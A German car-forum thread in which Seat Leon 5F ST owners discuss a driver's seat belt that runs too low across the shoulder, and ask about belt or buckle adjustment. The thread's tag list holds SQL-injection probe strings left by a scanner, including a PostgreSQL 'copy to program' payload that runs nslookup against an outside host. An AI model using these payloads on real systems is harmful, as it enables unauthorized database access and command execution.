[ST] Fahrer-Gurt verläuft zu tief, gibt es Abhilfe?

Diskutiere Fahrer-Gurt verläuft zu tief, gibt es Abhilfe? im 5F - Mängelliste Forum im Bereich Der Leon 3; Hallo, ich hatte vorher einen Leon 5F SC, also 3türer. Von dort kannte ich das Problem nicht! Nun habe ich einen Leon 5F ST, also mit 5türen...

BigP

Beiträge
1.385
Reaktionen
21
Hallo,

ich hatte vorher einen Leon 5F SC, also 3türer.
Von dort kannte ich das Problem nicht!

Nun habe ich einen Leon 5F ST, also mit 5türen. Die vorderen Türen sind etwas kürzer als beim 3türer und jedenfalls stört mich
der Fahrer-Gurt.
Er verläuft zu tief und berührt meinen Oberarm/Schulter beim nach rechts lenken!
Kein schönes Gefühl, gerade wenn man daran denkt, er könnte mal "eingerastet" sein und nicht nachgeben im entscheidenden Moment.

Sitz ist ganz unten, normale sportliche Sitzposition (nicht halb liegende Chillerposition) und ich bin mit 188cm auch nicht der aller Größte.
Gurt-Höheneinstellung gibt es ja leider nicht mehr, diese würde das Problem einfach beheben.

Gibt es sonst keinen den das stört bzw. habt ihr eine Idee?
(Bis auf Sitzposition etwas ändern und evtl. ein "Gurtpolster" anbringen der den Abstand etwas erhöht fällt mir nichts ein - vllt. ist es auch einfach nur ungewohnt und doof,
aber ich gewöhne mich schon noch daran?!)
 
27.02.2020
#1

Anzeige

Gast

Schau mal hier: Fahrer-Gurt verläuft zu tief, gibt es Abhilfe? . Dort wird jeder fündig!
Anton BS

Anton BS

Beiträge
22
Reaktionen
2
Bin aus einem Scirocco in den 5F umgestiegen und finde die Gurtposition zu weit vorne.. Beim Scirocco kam der Gurt von Hinten und lag schön auf der Schulter, beim Leon konnt der Gurt von oben und schwebt irgendwie vor der Schulter. Stört mich jetzt nicht beim Fahren, etwas seltsam ist es aber schon. Bin 176cm groß btw.
 
  • Gefällt mir
Reaktionen: RobbyRob88

BigP

Beiträge
1.385
Reaktionen
21
Kann man irgendwie am Gurtschloss etwas einstellen (unten rechts, wo man das Gurtschloss einsteckt)?
Wenn ich dieses etwas nach hinten einstellen kann, dann läuft der Gurt nicht mehr bzw. weniger gefährlich über meinen Arm.
 
Thema:

Fahrer-Gurt verläuft zu tief, gibt es Abhilfe?

Fahrer-Gurt verläuft zu tief, gibt es Abhilfe? - Ähnliche Themen

  • Poltergeräusche beim fahren

    Poltergeräusche beim fahren: Hallo, mein Leon von Baujahr 05/2014 1.4 TSI SC macht seit 1 Woche undefinierbare Geräusche . Vor allem zwischen Tempo 30-100 km/h hört man...
  • Probleme mit dem (Fahrer)schalensitz

    Probleme mit dem (Fahrer)schalensitz: Ich fahre ihn zwischen 7,5 - und 9,0 in der Langzeit! Ich bin jetzt knapp 10.000 km gefahren... und mein aufpreispflichtige Sportschalensitz ist...
  • Gurt blockiert am Berg

    Gurt blockiert am Berg: Hallo, kennt jemand das Problem, dass der Gurt blockiert wenn der Leon am Berg mit der Schnauze nach oben steht? Blockiert meist erst wenn das...
  • Leselampe flackert beim fahren

    Leselampe flackert beim fahren: Innenraumbeleuchtung flackert beim Bremsen Hallo, hab jetzt 1500 km mit dem Kleinen (5F SC Style, 1,6 TDI 105 PS) runter. So nach und nach...
  • Windgeräusche Leon 5F

    Windgeräusche Leon 5F: Hallo zusammen, am Donnerstag hatte ich den Termin für eine Probefahrt (1.4 FR 144). Auf der Bundesstraße hatte ich ab ca. 90km/h das Gefühl...
  • Windgeräusche Leon 5F - Ähnliche Themen

  • Poltergeräusche beim fahren

    Poltergeräusche beim fahren: Hallo, mein Leon von Baujahr 05/2014 1.4 TSI SC macht seit 1 Woche undefinierbare Geräusche . Vor allem zwischen Tempo 30-100 km/h hört man...
  • Probleme mit dem (Fahrer)schalensitz

    Probleme mit dem (Fahrer)schalensitz: Ich fahre ihn zwischen 7,5 - und 9,0 in der Langzeit! Ich bin jetzt knapp 10.000 km gefahren... und mein aufpreispflichtige Sportschalensitz ist...
  • Gurt blockiert am Berg

    Gurt blockiert am Berg: Hallo, kennt jemand das Problem, dass der Gurt blockiert wenn der Leon am Berg mit der Schnauze nach oben steht? Blockiert meist erst wenn das...
  • Leselampe flackert beim fahren

    Leselampe flackert beim fahren: Innenraumbeleuchtung flackert beim Bremsen Hallo, hab jetzt 1500 km mit dem Kleinen (5F SC Style, 1,6 TDI 105 PS) runter. So nach und nach...
  • Windgeräusche Leon 5F

    Windgeräusche Leon 5F: Hallo zusammen, am Donnerstag hatte ich den Termin für eine Probefahrt (1.4 FR 144). Auf der Bundesstraße hatte ich ab ca. 90km/h das Gefühl...
  • Schlagworte

    testing

    ,

    testing' AND 2*3*8=6*8 AND '5qRZ'='5qRZ

    ,

    testing" AND 2*3*8=6*8 AND "I8S5"="I8S5

    ,
    testing%' AND 2*3*8=6*8 AND '4FEa'!='4FEa%
    , testing';copy (select '') to program 'nslookup dns.sqli.\013405.1898-27158.1898.ff061.\1.bxss.me